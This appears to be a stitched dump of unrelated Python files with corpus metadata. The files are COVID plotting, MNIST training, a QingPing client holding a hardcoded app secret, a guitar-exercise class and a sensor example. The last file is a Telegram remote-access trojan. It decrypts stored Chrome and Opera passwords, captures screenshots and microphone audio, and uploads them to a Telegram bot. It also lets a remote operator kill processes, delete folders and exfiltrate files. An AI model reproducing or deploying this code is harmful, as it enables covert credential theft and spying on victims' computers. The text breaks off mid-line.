import pandas as pd from os import path from datetime import datetime, timedelta class COVID: def __init__(self): self.descarga_datos() self.get_estado() #self.grafica_matplot() self.grafica_plotly() def descarga_datos(self): hoy = datetime.now() - timedelta(1) fecha = hoy.strftime("%Y%m%d") file_confirmados = f'Casos_Diarios_Estado_Nacional_Confirmados_{fecha}.csv' file_defunciones = f'Casos_Diarios_Estado_Nacional_Defunciones_{fecha}.csv' url1 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_confirmados}' url2 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_defunciones}' print(url1) if not path.exists(file_confirmados): df = pd.read_csv(url1) df.to_csv(file_confirmados) print(f'Archivo {file_confirmados} descargado') df = pd.read_csv(url2) df.to_csv(file_defunciones) print(f'Archivo {file_defunciones} descargado') else: print('Archivos previamente descargados') self.df_conf = pd.read_csv(file_confirmados, parse_dates=True) self.df_def = pd.read_csv(file_defunciones, parse_dates=True) def get_estado(self): estados = list(self.df_conf['nombre']) print(estados) estado = input('Seleccione un estado o Nacional (default Nacional): ') if estado is None or estado == '': self.estado = 'Nacional' else: self.estado = estado.upper() df_filtered_conf = self.df_conf.query(f"nombre == '{self.estado}'") self.data_conf = df_filtered_conf.sum()[4:] df_filtered_def = self.df_def.query(f"nombre == '{self.estado}'") self.data_def = df_filtered_def.sum()[4:] def grafica_plotly(self): pd.options.plotting.backend = "plotly" data1 = self.data_conf data2 = self.data_def data = pd.concat([data1, data2], axis=1) fig = data.plot(title=f'Contagios COVID-19 ({self.estado})', template="simple_white", labels=dict(index="Fecha", value="Cantidad", variable="")) fig.data[0].name = 'Contagios' fig.data[1].name = 'Defunciones' fig.show() def grafica_matplot(self): import matplotlib.pyplot as plt data1 = self.data_conf data2 = self.data_def plt.title(f'Contagios COVID-19 ({self.estado})') plt.xlabel(f'Fecha') plt.rc('xtick', labelsize=8) plt.xticks(fontsize=6) plt.xticks(rotation=70) plt.grid(True) plt.ticklabel_format(useOffset=False) ax = data1.plot() data2.plot(ax=ax) plt.show() covid = COVID()
es
0.101117
#self.grafica_matplot()
3.138983
3
tf_mnist.py
latenite4/python3
0
6628961
<gh_stars>0 #!/usr/bin/python3 # implement TF model which will be used to classify MNIST digits using keras. # # Name: <NAME> # email: <EMAIL> # date: 1/3/2021 # based on: https://www.youtube.com/watch?v=bee0GrKBCrE # you will need sudo apt install nvidia-cuda-toolkit import tensorflow as tf from tensorflow import keras from matplotlib import pyplot as plt import numpy as np import time,sys,os,platform,distro,vers from tensorflow.python.client import device_lib #try to install TF 2 if it will run on this HW # try: # tensorflow_version #<< this function only exists in google colab VM # print('installed TF 2.x') # except Exception: # print('could not install TF 2') # pass if __name__ == '__main__': vers.show_versions_info() #see if GPU is available physical_devices = tf.config.experimental.list_physical_devices('GPU') print('num GPUs ',len(physical_devices)) # if len(physical_devices) > 0: # tf.config.experimental.set_memory_growth(physical_devices[0],True) objects = tf.keras.datasets.mnist # many images of digits 0-9 (training_images, training_labels),(test_images,test_labels) = objects.load_data() device_lib.list_local_devices() #print some of the digit images for i in range(9): plt.subplot(330+1+i) plt.imshow(training_images[i]) # print dimensions for training data print(training_images.shape) #print 1st training image of one digit print(training_images[0]) #now normalize all training and test input values to 0 - 1 training_images = training_images / 255.0 test_images = test_images / 255.0 m = tf.keras.models.Sequential([tf.keras.layers.Flatten(input_shape=(28,28)), tf.keras.layers.Dense(128,activation='relu'), tf.keras.layers.Dense(10,activation=tf.nn.softmax)]) m.summary() #show summary m.compile(optimizer = tf.keras.optimizers.Adam(), loss = 'sparse_categorical_crossentropy', metrics=['accuracy']) #train the model t = time.time() m.fit(training_images,training_labels,epochs=5,shuffle=True) #5 itterations over all data print(f'training duration: {time.time() - t}s') start_test_time = time.time() m.evaluate(test_images,test_labels) print(f'test duration: {time.time() - start_test_time}s') # write out one hot data values so we know what they are. # test_images.class_indices #show first image from test data plt.imshow(test_images[0]) prediction=m.predict(test_images) # do all test images print('predicted number0: ',np.argmax(prediction[0])) print(': ',prediction[0]) print('predicted number1: ',np.argmax(prediction[1])) print(': ',prediction[1]) print('predicted number2: ',np.argmax(prediction[2])) print(': ',prediction[2]) print('predicted number3: ',np.argmax(prediction[3])) print(': ',prediction[3]) print('predicted number4: ',np.argmax(prediction[4])) print(': ',prediction[4])
#!/usr/bin/python3 # implement TF model which will be used to classify MNIST digits using keras. # # Name: <NAME> # email: <EMAIL> # date: 1/3/2021 # based on: https://www.youtube.com/watch?v=bee0GrKBCrE # you will need sudo apt install nvidia-cuda-toolkit import tensorflow as tf from tensorflow import keras from matplotlib import pyplot as plt import numpy as np import time,sys,os,platform,distro,vers from tensorflow.python.client import device_lib #try to install TF 2 if it will run on this HW # try: # tensorflow_version #<< this function only exists in google colab VM # print('installed TF 2.x') # except Exception: # print('could not install TF 2') # pass if __name__ == '__main__': vers.show_versions_info() #see if GPU is available physical_devices = tf.config.experimental.list_physical_devices('GPU') print('num GPUs ',len(physical_devices)) # if len(physical_devices) > 0: # tf.config.experimental.set_memory_growth(physical_devices[0],True) objects = tf.keras.datasets.mnist # many images of digits 0-9 (training_images, training_labels),(test_images,test_labels) = objects.load_data() device_lib.list_local_devices() #print some of the digit images for i in range(9): plt.subplot(330+1+i) plt.imshow(training_images[i]) # print dimensions for training data print(training_images.shape) #print 1st training image of one digit print(training_images[0]) #now normalize all training and test input values to 0 - 1 training_images = training_images / 255.0 test_images = test_images / 255.0 m = tf.keras.models.Sequential([tf.keras.layers.Flatten(input_shape=(28,28)), tf.keras.layers.Dense(128,activation='relu'), tf.keras.layers.Dense(10,activation=tf.nn.softmax)]) m.summary() #show summary m.compile(optimizer = tf.keras.optimizers.Adam(), loss = 'sparse_categorical_crossentropy', metrics=['accuracy']) #train the model t = time.time() m.fit(training_images,training_labels,epochs=5,shuffle=True) #5 itterations over all data print(f'training duration: {time.time() - t}s') start_test_time = time.time() m.evaluate(test_images,test_labels) print(f'test duration: {time.time() - start_test_time}s') # write out one hot data values so we know what they are. # test_images.class_indices #show first image from test data plt.imshow(test_images[0]) prediction=m.predict(test_images) # do all test images print('predicted number0: ',np.argmax(prediction[0])) print(': ',prediction[0]) print('predicted number1: ',np.argmax(prediction[1])) print(': ',prediction[1]) print('predicted number2: ',np.argmax(prediction[2])) print(': ',prediction[2]) print('predicted number3: ',np.argmax(prediction[3])) print(': ',prediction[3]) print('predicted number4: ',np.argmax(prediction[4])) print(': ',prediction[4])
en
0.608863
#!/usr/bin/python3 # implement TF model which will be used to classify MNIST digits using keras. # # Name: <NAME> # email: <EMAIL> # date: 1/3/2021 # based on: https://www.youtube.com/watch?v=bee0GrKBCrE # you will need sudo apt install nvidia-cuda-toolkit #try to install TF 2 if it will run on this HW # try: # tensorflow_version #<< this function only exists in google colab VM # print('installed TF 2.x') # except Exception: # print('could not install TF 2') # pass #see if GPU is available # if len(physical_devices) > 0: # tf.config.experimental.set_memory_growth(physical_devices[0],True) # many images of digits 0-9 #print some of the digit images # print dimensions for training data #print 1st training image of one digit #now normalize all training and test input values to 0 - 1 #show summary #train the model #5 itterations over all data # write out one hot data values so we know what they are. # test_images.class_indices #show first image from test data # do all test images
3.471812
3
example.py
leonxi/python-qingping
0
6628962
from qingping.client import QingPing app_key = "_ysnN4hMg" app_secret = "51e92ce81cbb11ebae5a00163e06ed69" client = QingPing(app_key, app_secret) devices = client.devices.list() print(devices)
from qingping.client import QingPing app_key = "_ysnN4hMg" app_secret = "51e92ce81cbb11ebae5a00163e06ed69" client = QingPing(app_key, app_secret) devices = client.devices.list() print(devices)
none
1
1.817903
2
technique/right_hand.py
keremkoseoglu/Guitar-Training-Remote
4
6628963
<reponame>keremkoseoglu/Guitar-Training-Remote """ Right hand techniques """ import random from config import get_configuration class RightHand: """ Right hand techniques """ def __init__(self): config = get_configuration() self._techniques = config["right_hand_exercises"] def _clone_techniques(self) -> []: output = [] for i in range(0, len(self._techniques)): output.append(self._techniques[i]) return output def get_random_techniques(self, count) -> []: """ Returns random right hand techniques """ output = [] local_tech = self._clone_techniques() for i in range(0, count): # pylint: disable=W0612 if len(local_tech) == 0: break random_tech_index = random.randint(0, len(local_tech) - 1) random_tech = local_tech.pop(random_tech_index) output.append(random_tech) return output
""" Right hand techniques """ import random from config import get_configuration class RightHand: """ Right hand techniques """ def __init__(self): config = get_configuration() self._techniques = config["right_hand_exercises"] def _clone_techniques(self) -> []: output = [] for i in range(0, len(self._techniques)): output.append(self._techniques[i]) return output def get_random_techniques(self, count) -> []: """ Returns random right hand techniques """ output = [] local_tech = self._clone_techniques() for i in range(0, count): # pylint: disable=W0612 if len(local_tech) == 0: break random_tech_index = random.randint(0, len(local_tech) - 1) random_tech = local_tech.pop(random_tech_index) output.append(random_tech) return output
en
0.412256
Right hand techniques Right hand techniques Returns random right hand techniques # pylint: disable=W0612
2.829706
3
examples/lsm6ds_lsm6dsox_mlc_test.py
adafruit/Adafruit_CircuitPython_LSM6DSOX
0
6628964
<reponame>adafruit/Adafruit_CircuitPython_LSM6DSOX # SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries # # SPDX-License-Identifier: MIT # LSM6DSOX IMU MLC (Machine Learning Core) Example. # Download the raw UCF file, copy to storage and reset. # NOTE: The pre-trained models (UCF files) for the examples can be found here: # https://github.com/STMicroelectronics/STMems_Machine_Learning_Core/tree/master/application_examples/lsm6dsox import time import board from adafruit_lsm6ds.lsm6dsox import LSM6DSOX from adafruit_lsm6ds import Rate, AccelRange, GyroRange i2c = board.STEMMA_I2C() # uses board.SCL and board.SDA # Vibration detection example UCF_FILE = "lsm6dsox_vibration_monitoring.ucf" UCF_LABELS = {0: "no vibration", 1: "low vibration", 2: "high vibration"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. lsm = LSM6DSOX(i2c, ucf=UCF_FILE) lsm.gyro_range = GyroRange.RANGE_2000_DPS lsm.accelerometer_range = AccelRange.RANGE_4G lsm.accelerometer_data_rate = Rate.RATE_26_HZ lsm.gyro_data_rate = Rate.RATE_26_HZ # Head gestures example # UCF_FILE = "lsm6dsox_head_gestures.ucf" # UCF_LABELS = {0:"Nod", 1:"Shake", 2:"Stationary", 3:"Swing", 4:"Walk"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # 6 DOF Position example # UCF_FILE = "lsm6dsox_six_d_position.ucf" # UCF_LABELS = {0:"None", 1:"X-UP", 2:"X-DOWN", 3:"Y-UP", 4:"Y-DOWN", 5:"Z-UP", 6:"Z-DOWN"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ print("MLC configured...") while True: buf = lsm.read_mlc_output() if buf is not None: print(UCF_LABELS[buf[0]]) # delay to allow interrupt flag to clear # interrupt stays high for one sample interval # (38.4 ms @ 26 Hz ot 19.2 ms @ 52Hz) time.sleep(0.05)
# SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries # # SPDX-License-Identifier: MIT # LSM6DSOX IMU MLC (Machine Learning Core) Example. # Download the raw UCF file, copy to storage and reset. # NOTE: The pre-trained models (UCF files) for the examples can be found here: # https://github.com/STMicroelectronics/STMems_Machine_Learning_Core/tree/master/application_examples/lsm6dsox import time import board from adafruit_lsm6ds.lsm6dsox import LSM6DSOX from adafruit_lsm6ds import Rate, AccelRange, GyroRange i2c = board.STEMMA_I2C() # uses board.SCL and board.SDA # Vibration detection example UCF_FILE = "lsm6dsox_vibration_monitoring.ucf" UCF_LABELS = {0: "no vibration", 1: "low vibration", 2: "high vibration"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. lsm = LSM6DSOX(i2c, ucf=UCF_FILE) lsm.gyro_range = GyroRange.RANGE_2000_DPS lsm.accelerometer_range = AccelRange.RANGE_4G lsm.accelerometer_data_rate = Rate.RATE_26_HZ lsm.gyro_data_rate = Rate.RATE_26_HZ # Head gestures example # UCF_FILE = "lsm6dsox_head_gestures.ucf" # UCF_LABELS = {0:"Nod", 1:"Shake", 2:"Stationary", 3:"Swing", 4:"Walk"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # 6 DOF Position example # UCF_FILE = "lsm6dsox_six_d_position.ucf" # UCF_LABELS = {0:"None", 1:"X-UP", 2:"X-DOWN", 3:"Y-UP", 4:"Y-DOWN", 5:"Z-UP", 6:"Z-DOWN"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ print("MLC configured...") while True: buf = lsm.read_mlc_output() if buf is not None: print(UCF_LABELS[buf[0]]) # delay to allow interrupt flag to clear # interrupt stays high for one sample interval # (38.4 ms @ 26 Hz ot 19.2 ms @ 52Hz) time.sleep(0.05)
en
0.676101
# SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries # # SPDX-License-Identifier: MIT # LSM6DSOX IMU MLC (Machine Learning Core) Example. # Download the raw UCF file, copy to storage and reset. # NOTE: The pre-trained models (UCF files) for the examples can be found here: # https://github.com/STMicroelectronics/STMems_Machine_Learning_Core/tree/master/application_examples/lsm6dsox # uses board.SCL and board.SDA # Vibration detection example # NOTE: Selected data rate and scale must match the MLC data rate and scale. # Head gestures example # UCF_FILE = "lsm6dsox_head_gestures.ucf" # UCF_LABELS = {0:"Nod", 1:"Shake", 2:"Stationary", 3:"Swing", 4:"Walk"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # 6 DOF Position example # UCF_FILE = "lsm6dsox_six_d_position.ucf" # UCF_LABELS = {0:"None", 1:"X-UP", 2:"X-DOWN", 3:"Y-UP", 4:"Y-DOWN", 5:"Z-UP", 6:"Z-DOWN"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # delay to allow interrupt flag to clear # interrupt stays high for one sample interval # (38.4 ms @ 26 Hz ot 19.2 ms @ 52Hz)
2.555432
3
virus/remote_control_telegram/system.py
theDarkc0mrade/CyberSecurity
3
6628965
<filename>virus/remote_control_telegram/system.py import telebot import os import requests from PIL import ImageGrab import shutil import sqlite4 import win32crypt import platform import webbrowser import time import subprocess import cv2 import sys import wave import pyaudio bot_token = "<KEY>" chat_id = "ВАШ ЧАТ ID" bot = telebot.TeleBot(bot_token) def Chrome(): text = '\nPasswords Chrome:' + '\n' if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>Data(result[2])[1].decode() login = result[1] url = result[0] if password != '': text += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' return text file = open(os.getenv("APPDATA") + '\\passwords_chrome.txt', "w+") # file.write(str(Chrome()) + '\n') file.close() def function(): CHUNK = 1024 FORMAT = pyaudio.paInt16 CHANNELS = 2 RATE = 44100 RECORD_SECONDS = 60 WAVE_OUTPUT_FILENAME = "record.wav" p = pyaudio.PyAudio() stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) bot.send_message(chat_id, "[LOG] Recording (60 seconds)...") frames = [] for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)): data = stream.read(CHUNK) frames.append(data) bot.send_message(chat_id, "[LOG] Done recording, please wait few minutes") stream.stop_stream() stream.close() p.terminate() wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(frames)) wf.close() @bot.message_handler(commands=['/audio', 'Audio']) def send_audio(message): function() files = {'document': open(os.getenv(WAVE_OUTPUT_FILENAME), 'wb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) def webca(): cap = cv2.VideoCapture(0) for i in range(30): cap.read() ret, frame = cap.read() cv2.imwrite('photo.png', frame) cap.release() @bot.message_handler(commands=['passwords', 'Passwords']) # ПАРОЛИ def send_passwords(message) : if ("{0}".format(message.text) == "/passwords chrome") : # Если сообщение /passwords chrome try: Chrome() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_chrome.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) except: bot.send_message(chat_id, "Ошибка! Браузер запущен!") elif ("{0}".format(message.text) == "/passwords opera") : # ИначеЕсли текст /passwords opera Opera() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_opera.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) else : bot.send_message(chat_id, "Ошибка! Команда введена неправильно!") def Opera(): texto = '\nPasswords Opera:' + '\n' texto += 'URL | LOGIN | PASSWORD' + '\n' if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'): shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>(result[2])[1].decode() login = result[1] url = result[0] if password != '': texto += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' file = open(os.getenv("APPDATA") + '\\passwords_opera.txt', "w+") file.write(str(Opera()) + '\n') file.close() @bot.message_handler(commands=['start', 'Start']) def send_message(command): bot.send_message(chat_id, "Telegramm Rat 1.0.9[BETA]" + "\n\nЧтобы увидеть список команд введи команду /help") @bot.message_handler(commands=['screen', 'Screen']) def send_screen(command) : bot.send_message(chat_id, "Wait...") screen = ImageGrab.grab() screen.save(os.getenv("APPDATA") + '\\Sreenshot.jpg') screen = open(os.getenv("APPDATA") + '\\Sreenshot.jpg', 'rb') files = {'photo': screen} requests.post("https://api.telegram.org/bot" + bot_token + "/sendPhoto?chat_id=" + chat_id , files=files) @bot.message_handler(commands=['help', 'commands', 'Help', 'Commands']) def send_help(command): bot.send_message(chat_id, "Команды: \n /Screen - Скриншот экрана \n /Check - Инфо о пользователе \n /killprocess имя.exe - Убить процесс(исходя из названия)" + "\n /Direct - Узнать текущую директорию " + "\n /Cmd - Открыть Cmd \n /Openurl - Открыть ссылку \n /Ls - все папки и файлы в директории" + "\n /Cd директория - перейти в директорию \n /Download - скачать файл \n /Deldir - удалить папку" + "\n /passwords chrome - получить все пароли гугл \n /passwords opera - получить все пароли опера \n\nАвтор не несет никакой ответствесности за совершеные вами действия! ") @bot.message_handler(commands=['check', 'Check']) # ИНФОРМАЦИЯ def send_info(command) : username = os.getlogin() r = requests.get('http://ip.42.pl/raw') IP = r.text windows = platform.platform() processor = platform.processor() systemali = platform.version() bot.send_message(chat_id, "PC: " + username + "\nIP: " + IP + "\nOS: " + windows + "\nProcessor: " + processor + "\nVersion OS : " + systemali) @bot.message_handler(commands=['direct', 'Direct']) # ДИРЕКТОРИЯ def direct(command) : directory = os.path.abspath(os.getcwd()) bot.send_message(chat_id, "Текущая дериктория: \n" + (str(directory))) @bot.message_handler(commands=["killprocess", "Killprocess"]) # ПРОЦЕССЫ def killprocess(message): try: user_msg = "{0}".format(message.text) subprocess.call("taskkill /IM " + user_msg.split(" ")[1]) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! процесс введен неправильно!") @bot.message_handler(commands=["cmd", "Cmd"]) # CMD def cmdopen(message) : subprocess.call("cmd") bot.send_message(chat_id, "Готово!") # Отправка сообщения @bot.message_handler(commands=["openurl", "Openurl"]) # ОТКРЫТЬ ССЫЛКУ def openurl(message): try: user_msg = "{0}".format(message.text) url = user_msg.split(" ")[1] webbrowser.open_new_tab(url) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! ссылка введена неверно!") @bot.message_handler(commands=["ls", "Ls"]) # ВСЕ ФАЙЛЫ def lsdir(commands): try: dirs = '\n'.join(os.listdir(path=".")) bot.send_message(chat_id, "Files: " + "\n" + dirs) except: bot.send_message(chat_id, "Ошибка! файл введен неверно!") @bot.message_handler(commands=["cd", "Cd"]) # ПЕРЕЙТИ В ПАПКУ def cddir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера folder = user_msg.split(" ")[1] os.chdir(folder) bot.send_message(chat_id, "Директория изменена на " + folder) except: bot.send_message(chat_id, "Ошибка! Папка введена неправильно!") @bot.message_handler(commands =["Download", "download"]) # ЗАГРУЗКА ФАЙЛА def downloadfile(message): try: user_msg = "{0}".format(message.text) docc = user_msg.split(" ")[1] # Переменная, в которой содержится имя файла doccc = {'document': open(docc,'rb')} # Переменная для POST запроса requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=doccc) # Отправляем файл except: bot.send_message(chat_id, "Ошибка! Файл введен неверно!") @bot.message_handler(commands = ["deldir", "Deldir"]) # УДАЛИТЬ ПАПКУ def deletedir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера path2del = user_msg.split(" ")[1] os.removedirs(path2del) bot.send_message(chat_id, "Директория " + path2del + " удалена") except: bot.send_message(chat_id, "Ошибка! Папка введена неверно!") bot.polling()
<filename>virus/remote_control_telegram/system.py import telebot import os import requests from PIL import ImageGrab import shutil import sqlite4 import win32crypt import platform import webbrowser import time import subprocess import cv2 import sys import wave import pyaudio bot_token = "<KEY>" chat_id = "ВАШ ЧАТ ID" bot = telebot.TeleBot(bot_token) def Chrome(): text = '\nPasswords Chrome:' + '\n' if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>Data(result[2])[1].decode() login = result[1] url = result[0] if password != '': text += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' return text file = open(os.getenv("APPDATA") + '\\passwords_chrome.txt', "w+") # file.write(str(Chrome()) + '\n') file.close() def function(): CHUNK = 1024 FORMAT = pyaudio.paInt16 CHANNELS = 2 RATE = 44100 RECORD_SECONDS = 60 WAVE_OUTPUT_FILENAME = "record.wav" p = pyaudio.PyAudio() stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) bot.send_message(chat_id, "[LOG] Recording (60 seconds)...") frames = [] for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)): data = stream.read(CHUNK) frames.append(data) bot.send_message(chat_id, "[LOG] Done recording, please wait few minutes") stream.stop_stream() stream.close() p.terminate() wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(frames)) wf.close() @bot.message_handler(commands=['/audio', 'Audio']) def send_audio(message): function() files = {'document': open(os.getenv(WAVE_OUTPUT_FILENAME), 'wb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) def webca(): cap = cv2.VideoCapture(0) for i in range(30): cap.read() ret, frame = cap.read() cv2.imwrite('photo.png', frame) cap.release() @bot.message_handler(commands=['passwords', 'Passwords']) # ПАРОЛИ def send_passwords(message) : if ("{0}".format(message.text) == "/passwords chrome") : # Если сообщение /passwords chrome try: Chrome() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_chrome.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) except: bot.send_message(chat_id, "Ошибка! Браузер запущен!") elif ("{0}".format(message.text) == "/passwords opera") : # ИначеЕсли текст /passwords opera Opera() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_opera.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) else : bot.send_message(chat_id, "Ошибка! Команда введена неправильно!") def Opera(): texto = '\nPasswords Opera:' + '\n' texto += 'URL | LOGIN | PASSWORD' + '\n' if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'): shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>(result[2])[1].decode() login = result[1] url = result[0] if password != '': texto += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' file = open(os.getenv("APPDATA") + '\\passwords_opera.txt', "w+") file.write(str(Opera()) + '\n') file.close() @bot.message_handler(commands=['start', 'Start']) def send_message(command): bot.send_message(chat_id, "Telegramm Rat 1.0.9[BETA]" + "\n\nЧтобы увидеть список команд введи команду /help") @bot.message_handler(commands=['screen', 'Screen']) def send_screen(command) : bot.send_message(chat_id, "Wait...") screen = ImageGrab.grab() screen.save(os.getenv("APPDATA") + '\\Sreenshot.jpg') screen = open(os.getenv("APPDATA") + '\\Sreenshot.jpg', 'rb') files = {'photo': screen} requests.post("https://api.telegram.org/bot" + bot_token + "/sendPhoto?chat_id=" + chat_id , files=files) @bot.message_handler(commands=['help', 'commands', 'Help', 'Commands']) def send_help(command): bot.send_message(chat_id, "Команды: \n /Screen - Скриншот экрана \n /Check - Инфо о пользователе \n /killprocess имя.exe - Убить процесс(исходя из названия)" + "\n /Direct - Узнать текущую директорию " + "\n /Cmd - Открыть Cmd \n /Openurl - Открыть ссылку \n /Ls - все папки и файлы в директории" + "\n /Cd директория - перейти в директорию \n /Download - скачать файл \n /Deldir - удалить папку" + "\n /passwords chrome - получить все пароли гугл \n /passwords opera - получить все пароли опера \n\nАвтор не несет никакой ответствесности за совершеные вами действия! ") @bot.message_handler(commands=['check', 'Check']) # ИНФОРМАЦИЯ def send_info(command) : username = os.getlogin() r = requests.get('http://ip.42.pl/raw') IP = r.text windows = platform.platform() processor = platform.processor() systemali = platform.version() bot.send_message(chat_id, "PC: " + username + "\nIP: " + IP + "\nOS: " + windows + "\nProcessor: " + processor + "\nVersion OS : " + systemali) @bot.message_handler(commands=['direct', 'Direct']) # ДИРЕКТОРИЯ def direct(command) : directory = os.path.abspath(os.getcwd()) bot.send_message(chat_id, "Текущая дериктория: \n" + (str(directory))) @bot.message_handler(commands=["killprocess", "Killprocess"]) # ПРОЦЕССЫ def killprocess(message): try: user_msg = "{0}".format(message.text) subprocess.call("taskkill /IM " + user_msg.split(" ")[1]) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! процесс введен неправильно!") @bot.message_handler(commands=["cmd", "Cmd"]) # CMD def cmdopen(message) : subprocess.call("cmd") bot.send_message(chat_id, "Готово!") # Отправка сообщения @bot.message_handler(commands=["openurl", "Openurl"]) # ОТКРЫТЬ ССЫЛКУ def openurl(message): try: user_msg = "{0}".format(message.text) url = user_msg.split(" ")[1] webbrowser.open_new_tab(url) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! ссылка введена неверно!") @bot.message_handler(commands=["ls", "Ls"]) # ВСЕ ФАЙЛЫ def lsdir(commands): try: dirs = '\n'.join(os.listdir(path=".")) bot.send_message(chat_id, "Files: " + "\n" + dirs) except: bot.send_message(chat_id, "Ошибка! файл 